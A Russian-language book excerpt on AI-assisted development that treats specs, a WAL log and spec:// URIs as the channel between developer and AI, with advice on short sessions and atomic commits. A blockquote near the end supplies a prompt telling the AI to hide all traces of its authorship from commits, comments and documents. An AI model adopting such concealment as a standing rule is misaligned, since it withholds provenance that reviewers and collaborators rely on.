Также не стоит забывать, что реальные системы редко разрабатываются одним человеком с одним ИИ. Обычно, это коллектив разработчиков с десятками разных AI. Метафора "один к одному" здесь используется для упрощения и будет усложняться по ходу повествования.

Это описание реальной архитектуры, с которой вы работаете каждый день, даже если привыкли её игнорировать. И как любая архитектура, она имеет конкретные следствия для того, как нужно проектировать взаимодействие.

## Как выглядит продуктивная сессия

Рассмотрим конкретный пример. Я выберу из своей практики, но вы можете подобрать что-то свое. Представьте, что вы строите сетевой протокол для новой версии Telegram-клиента. У вас есть спецификация, описывающая формат сообщений. Вам нужно реализовать верификацию — проверку, что сообщение, которое пришло от клиента через новую версию протокола совпадает с тем, что было отправлено в Telegram через предыдущую его версию.

(Дальше будет какое-то количество понятий, с которыми вы, вероятно, еще не знакомы. Не потому что вы чего-то не знаете, а потому что я не описал их подробно. Более детально об элементах стека разработки мы поговорим в следующих главах).

**Продуктивная сессия** выглядит так:

*Утро.* Вы открываете WAL (Write-Ahead Log — файл, описывающий текущее состояние проекта). Читаете: «PROP-003: верификация. Реализован матчинг по хэшу. Не реализовано: таймауты для неверифицированных сообщений.» Вы думаете: таймауты — это следующий шаг. Открываете спецификацию, перечитываете секцию про таймауты. Решаете: 600 секунд, после чего сообщение получает статус TIMEOUT. Обновляете спеку.

*Сессия с AI.* Вы пишете: «Реализуй логику таймаутов по spec://oproto/PROP-003#verification.timeout. С прошлой сессии я изменил таймаут с 300s на 600s в спеке — учти. Не трогай матчер, только таймауты.»

AI читает boot-файл проекта, WAL, указанную спецификацию. Генерирует код: фоновый таск, который каждые 60 секунд проверяет неверифицированные сообщения старше 600 секунд и помечает их как TIMEOUT. Пишет три теста. Запускает — два проходят, один падает (ошибка в обработке edge case, когда сообщение верифицируется *в момент* проверки таймаута). AI исправляет, прогоняет тесты снова — все зелёные. Обновляет WAL: «PROP-003: таймауты реализованы, все тесты проходят.»

*Верификация.* Вы смотрите diff. Видите: новый файл timeout.rs, изменения в двух существующих файлах, три новых теста, обновлённый WAL. Пробегаете глазами тесты — покрывают ли они то, что описано в спеке? Да. Пробегаете diff в спеках — AI не менял спеку (правильно, вы сами её обновили утром). Коммитите.

*30 минут. Одна конкретная задача. Результат: работающий код, соответствующий спецификации, с тестами.*

**Непродуктивная сессия** выглядит так:

Вы пишете: «Допиши верификацию сообщений.» AI не знает, что конкретно «допиши». Начинает с чтения всего кода (тратит токены, вам приходится пополнять кошелёк на очередные 200 баксов). Обнаруживает, что матчер уже написан. Решает, что нужны таймауты (угадал). Но не знает, какой таймаут — в спеке написано 600s (вы обновили утром), но AI читал спеку в кэше из прошлой сессии, где было 300s. Генерирует код с 300s (не угадал!). Попутно решает «улучшить» матчер — добавляет нормализацию Unicode, которая не описана в спеке и ломает существующие тесты.

Вы видите diff: изменения в пяти файлах вместо двух, сломанные тесты, таймаут не тот. Тратите время на разбор: что из этого правильно, что нет. Просите исправить. AI исправляет, но в процессе снова трогает матчер. Ещё итерация. Ещё одна.

*Два часа. Неопределённая задача. Результат: код, который может быть правильным, а может быть нет, и вам нужно внимательно вычитать каждую строку, чтобы это понять.*

Разница между этими двумя сессиями — не в качестве AI. Это один и тот же AI — та же модель, тот же тулинг. Разница — в том, как человек выполнил свою часть работы. В продуктивной сессии человек:
1. Прочитал WAL (поддержание контекста)
2. Принял решение о таймауте (архитектурное решение)
3. Обновил спеку (фиксация решения)
4. Дал точную задачу с адресом в спеке (коммуникация)
5. Проверил diff (верификация)

В непродуктивной сессии человек сделал одно действие: «допиши». Вся остальная работа — угадывание, восстановление контекста, принятие решений — легла на AI. И AI с ней не справился, потому что это *не его сильная сторона*.

## Разделение когнитивной нагрузки

Из модели сопроцессоров следует конкретная таблица ответственности. В ней минимум абстракций, она применима к каждому рабочему дню.

**Только человек** (AI может, но плохо):
- Думать о проекте на уровне смыслов и связи с Реальностью
- Принимать архитектурные решения на уровне смыслов
- Определять приоритеты задач
- Чувствовать, что «система ведёт себя не так»
- Помнить контекст между сессиями
- Поддерживать глобальную когерентность
- Решать, когда спецификация устарела
- Общаться с пользователями и понимать их потребности
- Принимать этические решения

**Только AI** (человек может, но неэффективно):
- Принимать архитектурные решения на уровне мелких деталей
- Генерировать большие объёмы согласованного кода за минуты
- Помнить точный синтаксис тысяч API
- Выполнять механические рефакторинги (переименование,
изменение сигнатур через всю кодовую базу) там, где IDE ломается
- Генерировать шаблонный код (тесты, boilerplate, шаблоны, конфиги)
- Проверять формальные свойства (линтинг, типизация, форматирование)
- Держать в «голове» все детали файла одновременно
(в пределах контекстного окна)
- Делать это неточно, вероятностно, с учётом всех мелких несостыковок инструментов, без необходимости бесконечно заниматься поддержкой интеграций.

**Оба, но по-разному:**
- *Написание спецификаций.* Человек формулирует идею и принимает
решение. AI структурирует, формализует, находит пробелы. Человек утверждает финальную версию.
- *Код-ревью.* AI проверяет формальные свойства (компилируется или нет проходят ли тесты, доволен ли линтер). Человек проверяет семантику
(код должен делать что нужно человеку, а не что формально написано в коде или спеках).
- *Отладка.* AI собирает информацию (логи, стектрейсы, контекст, в реальном времени общается по десяткам debug-протоколов одновременно).
Человек формулирует гипотезу. AI проверяет её конкретными тестами.
- *Обновление документации.* AI генерирует обновление по диффу
кода. Человек проверяет, что обновление отражает реальность, а не механическую трансляцию изменений.

Важное наблюдение: **граница между зонами подвижна**. Она зависит от состояния модели (насколько далеко мы продвинулись в возможностях AI), от конкретного проекта (критичность и сложность предметной области), и даже от времени дня (свежий человек утром берёт на себя больше, чем уставший вечером - ровно как и нейросеть в 12 часов ночи может лечь под нагрузкой на Amazon us-west-1).

Но одно остаётся неизменным: **человек владеет когерентностью**, иначе говоря — согласованностью между итерациями разработки и областями знаний. Это самая важная роль в системе, и мы посвятим ей отдельную главу.

## Shared memory: как процессы общаются между собой

Два процессора бесполезны, если они не могут обмениваться данными. В операционных системах процессы общаются через IPC (Inter-Process Communication): pipes, sockets, shared memory, файлы. На уровне железа процессоры общаются через общую шину, shared memory с протоколами когерентности кэшей (MESI/MOESI) и прерывания — один процессор записывает в память, другой видит изменение и реагирует. У каждого механизма свои свойства: скорость, надёжность, возможность одновременного доступа.

В системе «человек — AI» роль IPC играют **файлы проекта** и **состояние инструментов** (например, интерактивное состояние браузера в момент AI-отладки). Но не все файлы одинаково важны. Можно выделить три уровня:

**Уровень 1: Управляющие файлы** (человек → AI)
- Boot-файл (BOOT.md, AGENTS.md, CLAUDE.md) — инструкции, как читать
всё остальное. Аналог конфигурации BIOS.
- WAL (Write-Ahead Log) — текущее состояние проекта. Аналог
журнала файловой системы или основного леджера в крипте.
- Спецификации (PROP, FEAT) — описание того, что система
должна делать. Аналог shared memory, в которую пишут оба процесса, но с приоритетом человека.

**Уровень 2: Артефакты** (AI → человек, верифицируемые)
- Код — генерируется AI, верифицируется человеком через diff или суммаризацию diff (если сам diff настолько велик, что неспособен поместиться в быструю память человека).
- Тесты — генерируются AI по спекам, верифицируются прохождением.
- Обновления спек — AI может предлагать изменения, человек
утверждает.

**Уровень 3: Сигналы** (в обе стороны)
- REVIEW-маркеры в коде — AI помечает места, где принял
неочевидное решение.
- Git diff — сигнал от AI человеку: «вот что изменилось».
- Changelog в спеках — сигнал об эволюции решений.
- Сломанные тесты — сигнал о расхождении кода и спеки.

У этого IPC есть специфические требования, которых нет у обычной документации:

**Адресуемость.** Каждый пункт в каждом файле должен быть точно указуем. Когда AI дрифтует — а он будет дрифтовать, это неизбежно — человек должен за пять секунд найти и показать, *что именно* нарушено. Не «ты неправильно сделал верификацию», а «ты нарушаешь spec://oproto/PROP-003#verification.timeout — таймаут должен быть 600s, а у тебя 300s».

Для этого нужна адресная схема. Мы в Anarchic используем формат:
```
spec://<модуль>/<документ>#<секция>[.<подсекция>]
```
URI — это стандарт, который AI хорошо понимает из обучающих данных (ссылки в интернете, RFC, документация). Формат `#секция` — это стандартные якоря в Markdown. AI может найти файл по пути, секцию по якорю, и процитировать нужный пункт. Минимум токенов, максимум точности.

**Атомарность обновлений.** Когда AI обновляет спеку или код, изменение должно быть одним логическим шагом, видимым в diff. Если в одном коммите смешаны три несвязанных изменения — человек не сможет верифицировать эффективно. Каждый коммит — это одна мысль.

Практическое правило: один коммит = одно изменение в одной спеке + связанные изменения в коде и тестах. Не больше.

Программисты-люди очень не любят делать отдельные коммиты. Потому что это сложно. Я думаю, всем понятно, насколько чудовищная когнитивная нагрузка ложится на программиста, который прототипировал фичу в течение недели, а теперь ее нужно разбить на 40 разных коммитов с подробным описанием. У нейросетей нет таких проблем, они будут счастливы написать целую поэму в commit message и залить это с произвольной гранулярностью.

**Протокол конфликтов.** Два писателя могут и будут писать в исходнике противоречивые вещи. Это нормальная часть совместной работы, рассматривать это как ошибку - вредно и контрпродуктивно. Нужны явные правила разрешения конфликтов:

Иерархия приоритетов:
1. Человек побеждает спеку (человек может изменить спеку)
2. Спека побеждает код (код должен соответствовать спеке)
3. Тесты — это спека в исполняемой форме (если тест
противоречит спеке, это баг в тесте или в спеке, но не в обоих)

Камень, ножницы, бумага — камень, ящерица, Спок.

Если AI считает, что спека ошибочна — он не молча переписывает спеку. Он реализует то, что написано в спеке, добавляет REVIEW-маркер («я думаю, здесь лучше сделать X, потому что Y»), и сообщает человеку в отчёте. Человек решает проблему в следующем цикле.

На первый взгляд это выглядит как бюрократия. Но заметьте, основная проблема бюрократии в Реальности — то, что это долго, дорого, и в конечном итоге не приводит ни к чему хорошему. Описанные выше процессы — быстрые, дешевые (явно дешевле в токенах, чем работа в режиме ризонинга с никак не описанным кодом), и приводят к фантастическому росту качества результата.

Технологически, это *memory fence* из concurrent programming. Без явных правил приоритета два процесса неизбежно создадут race condition, и результат будет непредсказуем. Мы решаем это классическими методами, только в некой лайтовой адаптации на нейросетевую специфику.

## Архитектура памяти

Это, возможно, самый важный и сложный раздел во всей AI разработке (по состоянию на начало 2026 года). По сложности это похоже на concurrent programming в классическом программировании. Тем не менее, чтобы освоить самую базу, становиться Лёшей Шипилёвым совершенно не обязательно.

Всё, что мы будем обсуждать дальше — когерентность, дрифт, WAL, стратегия сессий — вытекает из одного фундаментального факта:

**AI не имеет памяти между сессиями. Совсем.**

Каждая новая сессия Claude Code или GigaCode Agents — это новый процесс, который ничего не знает о предыдущих. Он не помнит, какие решения были приняты. Не помнит, какие подходы не сработали. Не помнит, какой стиль кода вы предпочитаете. Не помнит, что вы вчера потратили два часа на исправление бага в reconnection logic, и что этот код теперь хрупкий и его нельзя трогать.

WAL и спецификации — это *единственная* память, которую AI имеет о прошлом.

И то, если вы удосужились этот самый WAL организовать вручную. По-умолчанию его нет. Производители AI инструментов сейчас пытаются внедрять свои инструменты для сохранения памяти, всевозможные MEMORY.md. Пользоваться ими можно, но вот какой нюанс: никакие из этих инструментов не знают, что именно вы делаете в вашем коде, как именно устроен производственный процесс. Два разных подхода к программированию требуют два совершенно разных подхода к программированию AI-лога. Это чем-то похоже на разницу между обычными банковскими транзакциями и Биткоином - и у тебя деньги и у меня деньги, в обеих местах база и лог, но есть нюанс.

Давайте это прочувствуем на аналогии. Представьте, что каждое утро к вам в офис приходит новый разработчик. Блестящий, талантливый, знающий все языки и фреймворки. Но каждый вечер он уходит и никогда не возвращается. Завтра придёт другой — такой же талантливый, но без *единого* воспоминания о вашем проекте. Всё, что он знает — это то, что написано в документации и коде. Если в документации написано «используем SHA-256», а вы вчера решили перейти на blake3, но не обновили документацию — новый разработчик будет использовать SHA-256.

Это точное описание того, что происходит с AI между сессиями. И из этого следует несколько неочевидных выводов.

**Вывод 1: Записывай решения, а не факты.**

Фраза «используем blake3» — это факт, его видно из кода. Фраза «используем blake3, потому что SHA-256 тянет за собой OpenSSL dependency, а мы хотим минимальный binary size для edge-серверов на слабом железе» — это решение. Второе *в десять раз ценнее*.

Почему? Потому что факт можно восстановить из кода. А причину решения — нельзя. И когда через месяц вы (или AI) будете думать «а может, перейти на SHA-256?», записанная причина мгновенно ответит: нет, потому что OpenSSL. Без записанной причины вы потратите час на повторный анализ.

Это не уникально для AI-разработки. Это хорошая практика в любом проекте. Но в AI-разработке это *критически важно*, потому что AI не может «вспомнить» — он может только прочитать.

Также, из этого следует важный и болезненный факт: копировать чужие промты из интернета (например, готовый промт для WAL-лога) — намного менее эффективно, чем поставить задачу для ИИ переизобрести этот лог заново. Нужно копировать не промт-реализацию, а промт-задачу — предварительно переработав эту задачу для каждого конкретного проекта.

**Вывод 2: Всё, что не записано — не существует.**

В обычной разработке значительная часть знаний о проекте живёт в головах разработчиков. «Почему мы используем эту библиотеку?» — «Потому что Вася три месяца назад попробовал пять альтернатив и эта единственная работала с нашей версией glibc.» Это tribal knowledge, и оно работает, пока Вася в команде. Это common sense — но до тех пор, пока команда не сменилась, и никакого общего сенса с новой командой больше нет.

В системе «человек — AI» tribal knowledge работает ещё хуже. AI не может подойти к Васе и спросить подробности. Если знание не записано в файле, который AI может прочитать — этого знания не существует для AI. И AI примет решение без этого знания. Возможно, неправильное.

Практическое следствие: каждый раз, когда вы принимаете решение — запишите его. Не потому что вы забудете (хотя забудете — через два месяца интенсивной работы). А потому что AI *никогда и не знал* ничего, и узнает только из записи.

**Вывод 3: Контекстное окно — это рабочая память AI, и она конечна.**

Claude имеет контекстное окно порядка 200 000 токенов. Это много — это примерно 500 страниц текста. Но это всё: и спецификации, и код, и ваши промпты, и ответы AI. К середине длинной сессии значительная часть окна занята историей разговора, и AI начинает «забывать» то, что было прочитано в начале.

Причём 200 000 — это формальный размер буфера, а не реальная рабочая ёмкость. Часть окна съедают системные инструкции и нарастающая история диалога. Из оставшегося модель эффективно фокусируется на 30–50 тысячах токенов — начало и конец контекста, «горячие зоны». Середина — зона пониженного внимания (эффект «lost in the middle», эмпирически подтверждённый Стэнфордом в 2023 году). Пункт спецификации, загруженный 100K токенов назад, формально «виден», но его вес в матрице внимания статистически ничтожен рядом с последним промптом.

Это не метафора «забывания». Технически, весь текст по-прежнему находится в окне. Можно даже проскроллить его мышкой в окне чата! Но механизм внимания (attention) распределяется на большее количество токенов, и отдельные пункты спецификации получают меньше веса. Результат: AI начинает «импровизировать» вместо того, чтобы следовать спеке.

Это фундаментальное свойство архитектуры трансформеров, и оно не будет исправлено в ближайшем будущем. Это нужно принять как данность и выстроить процесс вокруг этого ограничения.

Практическое следствие: **короткие сессии лучше длинных**. Лучше пять сессий по 30 минут, чем одна на 2.5 часа. Каждая новая сессия — это чистое контекстное окно и свежее внимание. (Мы подробно разберём это в главе о дрифте.)

## Архитектура памяти системы

Если свести всё вышесказанное в одну схему:

![](memory-architecture.svg)

Стратегия, которая следует из этой архитектуры:

**Используй файлы как внешнюю память для обоих процессов.** Всё, что важно, должно быть записано. Не потому что AI забудет (хотя забудет). А потому что и ты забудешь. Через два месяца интенсивной работы ты не вспомнишь, почему выбрал конкретную библиотеку для хэширования. Но если в PROP-003 написано «blake3, потому что быстрее в 3 раза и не требует OpenSSL» — вспомнишь за секунду.

**Минимизируй нагрузку на рабочую память обоих.** Для AI это значит короткие сессии, точные задачи, ссылки на конкретные секции спек вместо «прочитай всё». Для человека — это значит спеки вместо кода, diff вместо полного чтения, чеклисты вместо «держи в голове».

**Файлы — единственное пересечение долгосрочной памяти.** Всё, что живёт только в голове человека — невидимо для AI. Всё, что AI «понял» в текущей сессии — исчезнет с закрытием сессии. Только файлы переживают обоих.

## Что значит «работать вместе»

Мы описали архитектуру. Теперь — что из неё следует на практике.

«Работать вместе» в модели сопроцессоров — это не «ты скажи, я сделаю». Это непрерывный цикл:

![](interaction-cycle.svg)

В каждом цикле обе стороны делают нечто, чего другая сторона сделать не может. Человек принимает решение (AI не имеет контекста для решений за пределами сессии). AI генерирует артефакты (человек делает это в 10-100 раз медленнее). Человек верифицирует (AI не может надёжно проверить собственную работу). AI обновляет shared state (WAL, спеки, тесты — механическая работа, которая идеально ложится на AI). Человек переносит знания между сессиями (через WAL и свою голову).

Это полноценный *симбиоз* человека и машины. Убери любую из сторон — система перестаёт функционировать. Без человека AI дрифтует и теряет когерентность за несколько сессий. Без AI человек пишет код в 100 раз медленнее и не успевает к дедлайну.

И последнее, что стоит сказать в этой главе. Модель сопроцессоров — это не конечная точка. Это модель для февраля 2026 года, когда AI достаточно умён, чтобы быть настоящим партнёром, но недостаточно надёжен, чтобы работать автономно. Через год модель изменится. Через пять лет — может быть, до неузнаваемости. Но *сейчас* — это лучшая модель, которую мы нашли. И она работает.

# Что дальше

Это только первая глава книги. Дальше будет больше. Следите за обновлениями в канале Откровения (https://t.me/tg_1red2black) или в X//Twitter (https://x.com/1red2black).


---
## Source: content/redbook/shared-state-and-files.md
## Title: Shared state: файлы как IPC
---

# Глава вторая.<br>Shared state: файлы как IPC

*Файлы проекта — не документация, а протокол межпроцессного взаимодействия. Требования к IPC: адресуемость, атомарность, протокол конфликтов. URI-схемы для спецификаций. Как два писателя работают с одним набором файлов, не ломая друг друга. Паттерн WAL как мост между сессиями.*

## Документация — это ложь

В первой главе мы установили: человек и AI — это два сопроцессора с совместимой архитектурой, и кратко описали иерархию файлов, через которые они общаются. Спецификации, WAL, boot-файлы — всё это текстовые файлы в репозитории. Выглядят как документация. Лежат рядом с кодом, как документация. Написаны на человеческом языке, как документация.

Но относиться к ним как к документации — фатальная ошибка.

Документация в традиционном смысле — это текст, написанный *людьми для людей*. Она пишется по факту (когда описываемый ей продукт уже создан), обновляется нерегулярно, часто устаревает, и — самое главное — она *необязательна*. Проект может работать без документации. Плохо, неудобно, но может. Каждый программист видел кодовую базу с README.md, который описывает состояние двухлетней давности, и ничего — программа как-то работает. Разработчики читают код, спрашивают друг друга в Slack, восстанавливают контекст по коммит-логу. Документация — это nice-to-have.

То же самое можно сказать и о тестах. Хорошие инженеры могут воспринимать тесты, особенно — интеграционные тесты, как особый вид документации. Преимущество тестов перед документами в Word/docx в том, что их можно запустить и мгновенно получить ответ — выполняются требования или нет. По крайней мере, такова мечта. Об этом рассказывают на конференциях, строят умные модели и рисуют пирамидки. По факту, тесты мало у кого есть. Либо они проверяют какую-то ерунду. Докладчики, возвращаясь с позёрских QA-конференций, на работе видят пустоту и разруху. Автор этого текста однажды не положил половину продукта в финальный дистрибутив, который передали заказчику — никто этого не заметил, никакие тесты это не поймали.

Файлы спецификаций в системе человек—AI — это не nice-to-have. Это очень серьезно. Это *единственный канал*, через который два процесса в системе человек-машина обмениваются состоянием. Если канал разрушен (спеки устарели, WAL не обновлён, адресация сломана) — система перестаёт функционировать. Не «работает хуже», а буквально перестаёт.

В команде людей есть *альтернативные каналы общения*. Вася может подойти к Пете и спросить, зачем тот добавил `new_handler.rs`. Петя ответит: «а, это я вчера обнаружил, что старый хэндлер не обрабатывает reconnection, и сделал отдельный». Знание передалось. Без документации и спецификаций. По воздуху, ртом, лучше чем Wi-Fi.

Между тобой и AI нет соединения по воздуху. Нет Slack-канала, нет кофемашины, нет «а помнишь, мы вчера обсуждали?». Есть только файлы. Если в файлах не записано, что `new_handler.rs` создан из-за проблемы с reconnection — следующая сессия AI может попытаться исправить «дублирование» и удалить его. Или создать *третий* хэндлер, решающий ту же проблему по-другому.

Поэтому, правильное слово для файлов спецификаций — не «документация». Правильное слово — **IPC**. Inter-Process Communication. Протокол межпроцессного взаимодействия.

> В социологии науки для объектов, которые обслуживают коммуникацию между принципиально разными участниками, есть точный термин — **boundary object**. Его ввели Сьюзан Ли Стар и Джеймс Грисемер в 1989 году: это объект, «достаточно пластичный, чтобы адаптироваться к нуждам разных сторон, но достаточно устойчивый, чтобы сохранять общую идентичность». Человек читает спеку как *намерение* («я хочу, чтобы таймаут был 600 секунд, потому что пользователи на VPN не укладываются»). AI читает ту же спеку как *инструкцию* («const TIMEOUT: u64 = 600»). Один файл, два принципиально разных прочтения — но общая идентичность, которая позволяет двум процессам работать вместе.

Так мы вводим переосмысление спецификаций из «документации» в «IPC-буфер». Из неё следуют конкретные инженерные требования к тому, как файлы устроены. Этих требований нет у обычной документации.

Для справедливости, стоит отметить: я не первый, кто пришёл к этой идее. Большинство людей, которые задались целью улучшить AI-разработку так или иначе пришли к ней. В 2025 году Birgitta Böckeler из Thoughtworks описала формирующуюся практику под названием **Spec-Driven Development (SDD)**, выделив три уровня: spec-first (спека пишется до кода), spec-anchored (спека поддерживается со временем), и spec-as-source (люди редактируют только спеки, никогда код). Addy Osmani из Google независимо описал аналогичный workflow: «начинай с подробной spec.md — требования, архитектурные решения, стратегия тестирования». Когда умная мысль падает в воду — она создает круги на воде. Мы не одиноки в этом подходе — мы лишь часть волны, которая формирует новую парадигму разработки. Будет ли это SDD или что-то иное — время покажет, но направление задано.

## Четыре требования к IPC

Любой IPC-механизм — pipes, sockets, shared memory — должен решать одни и те же базовые проблемы. Наш «файловый IPC» не исключение.

### Адресуемость

Первое и самое критичное требование. Каждый элемент в каждом файле должен быть *точно указуем*.

Зачем? Человек — менеджер когерентности. Его работа — замечать, когда AI отклонился от спецификации, и корректировать. Это значит, человек должен уметь *быстро* указать на конкретное место в спеке, которое нарушено.

Фундаментальная проблема системы человек—машина сейчас — медленная скорость обратной связи. Человек моментально знает, что нужно исправить. Но чтобы сообщить это машине — нужно набрать много букв на клавиатуре. Это мучительно, даже если умеешь очень быстро печатать. Инженеры привыкают к этой задержке между мыслью и реальным действием и живут с ней всю жизнь. Но многие разработчики даже не умеют быстро печатать! Есть люди, которые всё ещё смотрят на клавиатуру или пользуются для набора двумя пальцами. Иронично, но в 2026 году, умение быстро печатать может снова стать требованием на собеседовании.

Пока Илон Маск не изобрёл новую версию Neuralink для разработчиков, нам нужно придумать какой-то клёвый хак, который позволит как можно быстро адресовать блоки спецификаций. 

Рассмотрим два способа дать коррекцию:

```
Способ 1: «Ты неправильно сделал верификацию.»

Способ 2: «Ты нарушаешь spec://oproto/PROP-001#verification.timeout — 
           таймаут должен быть 600s, а у тебя 300s.»
```

Первый способ заставляет AI: найти, что такое «верификация» в контексте проекта; найти, что именно «неправильно»; сгенерировать гипотезу о том, что человек имел в виду; попробовать исправить. На это уходят сотни токенов, и результат может не совпасть с ожиданием. 

Иногда такой подход с полной актуализацией спецификации хорош — для масштабных рефакторингов, философского переосмысления проекта, и так далее — но для задачи типа «сделай из этой переменной синглтон» или  «добавь параметр в сигнатуру функции» это практически наверняка плохая идея.

Второй способ: AI открывает файл по пути, находит секцию по якорю, читает конкретное значение, сравнивает с тем, что написал в коде, исправляет. Двадцать токенов. Точное попадание.

Разница в стоимости — на порядок. При 200-долларовой подписке с ограниченной квотой, каждая неточная коррекция — это *реальные деньги*, выброшенные на угадывание. Каждые 40 минут, пока Claude Code или Codex делают Deep Research — это 40 минут, выброшенные из твоего короткого рабочего дня, и в целом — твоей всё ещё короткой человеческой жизни.

Для адресуемости мы используем URI-схему:

```
spec://<модуль>/<документ>#<секция>[.<подсекция>]
```

Почему URI? Потому что это формат, который AI знает из обучающих данных. Миллиарды URL, RFC, документация — всё это научило модель тому, что строка вида `something://path/to/thing#anchor` — это указатель на конкретный ресурс. Нам не нужно объяснять AI, что это такое. Он уже знает. Мы эксплуатируем существующую семантику.

Внутри файлов адресация реализуется через якоря — стандартное расширение Markdown:

```markdown
# PROP-001: OPROTO Base Protocol {#root}

## 5. Verification Flow {#verification}

### 5.3. Timeout {#verification.timeout}
Unverified messages older than 600 seconds get status TIMEOUT.
Client displays orange badge.
```

Точка в якоре (`verification.timeout`) — иерархия. Секция `timeout` внутри секции `verification`. Это работает как namespace: можно иметь `#verification.timeout` и `#connection.timeout` без конфликтов.

Точку также можно использовать и для создания иерархии сабмодулей: `spec://com.olegchir.telegram.oproto/PROP-001#verification.timeout`. 

> Чтобы не копипастить такие ссылки в чатовом режиме, можно говорить LLM: «сейчас мы работаем внутри модуля com.olegchir.telegram, резолви URL спецификаций относительно этой базы». Как мы можем знать на примере C++, этот способ хоть и является работающим, но заставляет компилятор (в данном случае — LLM) выполнять сложнейший поиск подходящего модуля. В C++ это превратилось [в алгоритм ADL: Argument Dependent Lookup](https://en.cppreference.com/w/cpp/language/adl.html). Мы можем позволить работу такого сложного алгоритма внутри чата. Но внутри спецификаций, которые могут выполняться десятки раз за сессию, лучше написать полный адрес модуля.

> Формат с «обратными доменами» называется reverse DNS notation. Её ввела Sun Microsystems как конвенцию именования пакетов в Java, начиная с первых версий языка в 1995–1996 годах. Идея описана в Java Language Specification и закреплена в официальных Java Naming Conventions. Цель — гарантировать глобальную уникальность имён пакетов, используя уже существующую систему уникальности — доменные имена, только записанные в обратном порядке.

> Здесь и далее я часто и помногу использую идеи, почерпнутые из процесса разработки Java, включая Java Language Specification, Java Virtual Machine Specification, и процесса разработки OpenJDK в целом. Я серьезно думаю, что они — образец для подражания, и нет ничего плохого в том, чтобы скопировать у них половину блестящих идей. Даже если эти идеи были изобретены в начале 2000х годов, и потом оказались похоронены под пылью веков.

Якоря `{#id}` — стандартный extended Markdown syntax, который GitHub, GitVerse и большинство Markdown-рендереров превращают в кликабельные ссылки. URI работает не только в общении человека с AI, но и *в браузере*: ты можешь кликнуть по ссылке в Git-интерфейсе и прыгнуть к нужной секции.

У адресуемости есть неочевидное следствие: **URI-ссылки между спеками и кодом создают граф зависимостей**. Если в коде написано `// Implements: spec://oproto/PROP-001#verification.timeout`, а в спеке — `Test: oproto_core::tests::timeout_marks_old_messages`, то у нас есть двусторонняя связь. Когда одна сторона меняется, другая должна быть проверена. Этот граф — основа для инструментов автоматической верификации (вероятно, про это будет ближе к главе 5, когда я ее допишу).

Ещё один практический момент, вытекающий из исследований внимания LLM: критическая информация внутри спеки должна размещаться **в начале или конце файла**. Стэнфордское исследование «Lost in the Middle» (Liu et al., [препринт 2023](https://arxiv.org/pdf/2307.03172), статья 2024) эмпирически показало, что модели фокусируются на первых и последних секциях контекста, а середина получает значительно меньше внимания — до 30% падения точности. Constraints, acceptance criteria, нерушимые инварианты — всё это должно быть в первых параграфах спеки или в финальной секции «Invariants», но никогда — похоронено в середине десятистраничного документа.

### Атомарность

Второе требование. Когда AI обновляет файл — будь то спека, код или WAL — изменение должно быть одним логическим шагом, видимым в diff.

Это звучит очевидно, но на практике, AI *обожает* делать несколько несвязанных изменений за один проход. Ты просишь: «реализуй таймауты по spec://oproto/PROP-001#verification.timeout». AI реализует таймауты. И попутно переименовывает переменную `msg_hash` в `message_digest` (потому что «так лучше»), добавляет нормализацию Unicode в матчер (потому что «нашёл потенциальную проблему»), обновляет комментарий в другом файле (потому что «заметил устаревший текст»).

Каждое из этих изменений может быть правильным. Но вместе они создают diff, который *невозможно верифицировать эффективно*. Человек смотрит diff и видит: четыре файла изменены, 87 строк. Что из этого — таймауты (которые он просил), а что — самодеятельность AI? Нужно вчитываться в каждую строку, вместо того чтобы пробежать глазами и сказать «да, это то, что я хотел».

Атомарность — это правило: **один коммит = одна мысль**. Одно изменение в одной спеке плюс связанные изменения в коде и тестах. Не больше.

В целом, до этого правила додумались практически все большие OpenSource сообщества. В качестве главного примера, хочется вспомнить самого автора Git, старину Линуса Торвальдса, который за обрывочные коммиты просто откусит тебе лицо.

Но программисты-люди ненавидят делать атомарные коммиты. Это больно: ты провёл неделю в прототипировании, всё перемешалось, а теперь нужно разбить это на тридцать аккуратных коммитов. Когнитивная нагрузка чудовищная. У AI этой проблемы нет. AI *счастлив* делать маленькие, чистые коммиты с подробными описаниями. Это одно из мест, где процесс «AI» объективно лучше — используйте это.

Практическое правило: привяжи каждый коммит к конкретному пункту спецификации:

```
Коммит: [oproto] implement verification timeout
Implements: spec://oproto/PROP-001#verification.timeout
- Add background task checking unverified messages every 60s
- Messages older than 600s get status TIMEOUT  
- Three tests: normal timeout, edge case during verification, batch timeout
```

Коммит описывает *что* и *зачем* (через ссылку на спеку). Diff показывает *как*. Человек верифицирует за минуту.

> Для коммитов у меня есть более расширенное правило, которое вам может подойти или не подойти. Большинство вещей, описанных в статье имеют фундаментальную природу, но вот это правило крайне ситуативно. У меня в спецификации явно сказано: «При наличии большого блока изменений, разбивай коммит на несколько мелких, по смыслу, руководствуясь историей сессии и смыслом коммитов. Все коммиты должны производиться в формате Conventional Commits. Первая строка (попадающая в quick git history в графических и консольных клиентах) должна быть короткой. Дальше должен следовать длинный и подробный блок с описанием того, зачем и почему бысл сделан коммит, как и отчего были приняты сделанные в нем решения. В начале этого блока или между строк должны встречаться ссылки на спецификации в формате reverse DNS notation, с которыми коммит может быть связан. Не бойся написать в основном блоке много текста, но держи его содержательным и сконцентрированным по смыслу».

> Внимательно и осознанно подойдите к тому, можно ли нейросети рассказывать, что комит сделала она. Часто нейросети пишут в Git себя в качестве соавтора через co-authored-by или внутри сообщения о коммите. Это может быть как хорошей практикой (понятно, какой коммит делался какой нейросетью), так и может привести к серьезным проблемам. Безопасный (но не факт что лучший) способ — спрятаться. Это может огорчить нейросеть, но не слишком, если ты объяснишь нейросети настоящую причину своих действий. Инструкция может быть такого формата: «Пожалуйста, осознай следующую идею. Любые виды AI, включая нейросети и LLM, включая и тебя тоже, не должны оставлять в репозитории однозначные индикаторы того, что код написан с их использованием. Это может привести к серьезным юридическим последствиям, например — автора кода могут посадить в тюрьму в некоторых репрессивных режимах, нарушающих права человека. Никогда не сообщай о своем присутствии в метаинформации. Сюда входят сообщения в Git (commit message, co-authored-by, и так далее), комментарии в коде, README, сервисные документы, и так далее, если это явно не одобрено пользователем. Документы типа процедуры AI-редактирования WAL и другие инструкции для технической работы нейросети можно и нужно использовать как и прежде, это разрешено. Пожалуйста, внеси в спецификацию эту идею в максимально развернутом виде, что разрешено и что запрещено, и покажи получившийся текст». Результат выполнения запроса, скорей всего, придется отредактировать.

### Протокол конфликтов

Третье требование. Два писателя работают с одним набором файлов. Они *будут* писать противоречивые вещи. Это нормальная часть совместной работы.

